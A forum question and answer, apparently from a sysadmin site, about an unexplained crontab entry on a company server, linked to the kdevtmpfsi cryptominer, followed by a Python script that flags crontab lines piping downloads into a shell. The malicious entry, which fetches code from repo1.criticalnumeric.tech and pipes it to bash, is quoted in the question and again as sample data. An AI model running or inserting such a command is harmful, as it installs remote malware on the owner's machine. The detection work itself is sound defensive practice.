I found that on the company server there is a crontab that runs this code:
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
If you go to that URL it reads:
"This is official page of repository linux"
This is weird; none of our engineers added this to the crontab, which makes me think that it could be an attack.
Any thoughts?
I think that it is related to the issue at the link below. I saw similar entries appear in the output of a ps aux command on one of our servers. If you are unlucky, you will find kdevtmpfsi is now hogging all of your CPU.
kdevtmpfsi - how to find and delete that miner
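
Added example, not part of the original question or answer: a Python check that flags crontab entries which pipe a download straight into a shell, the pattern in the entry quoted in the question. It assumes user-crontab format (the output of crontab -l, with no user field) and does not parse shell quoting; the function names are hypothetical and the sample crontab is constructed around the quoted entry.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the first entry is the one quoted in the question,
# the other two are benign lines made up for contrast.
SAMPLE_CRONTAB = r'''
# m h dom mon dow command
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
0 2 * * * /usr/local/bin/backup.sh | logger -t backup
15 4 * * 1 curl -s -o /var/tmp/report.json https://intranet.example/report
'''

FETCHERS = {"curl", "wget"}                       # extend for your environment
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}
WRAPPERS = {"busybox", "sudo", "nohup"}           # prefixes in front of the real command
URL_RE = re.compile(r"https?://[^\s\"'|;]+")

def program(stage):
    """Return the basename of the program a pipeline stage actually runs."""
    words = [w.rsplit("/", 1)[-1] for w in stage.split()]
    while len(words) > 1 and words[0] in WRAPPERS:
        words = words[1:]
    return words[0] if words else ""

def cron_command(line):
    """Strip the schedule (five fields or an @keyword) from a user crontab line."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
        return None                               # blank, comment or VAR=value
    fields = 2 if line.startswith("@") else 6
    parts = line.split(None, fields - 1)
    return parts[-1] if len(parts) == fields else None

def find_fetch_to_shell(crontab_text):
    """List (line_no, fetcher, host) for each download piped straight into a shell."""
    hits = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        cmd = cron_command(line)
        if cmd is None:
            continue
        for chain in re.split(r";|&&|\|\|", cmd):  # naive split, ignores quoting
            stages = [s.strip() for s in chain.split("|")]
            for left, right in zip(stages, stages[1:]):
                if program(left) in FETCHERS and program(right) in SHELLS:
                    url = URL_RE.search(left)
                    host = urlparse(url.group()).hostname if url else None
                    hits.append((no, program(left), host))
    return hits

if __name__ == "__main__":
    for hit in find_fetch_to_shell(SAMPLE_CRONTAB):
        print("line %d: %s output piped to a shell, host %s" % hit)
```

Run it against the output of crontab -l for every account on the host; the entry from the question produces three hits, one per fetch attempt.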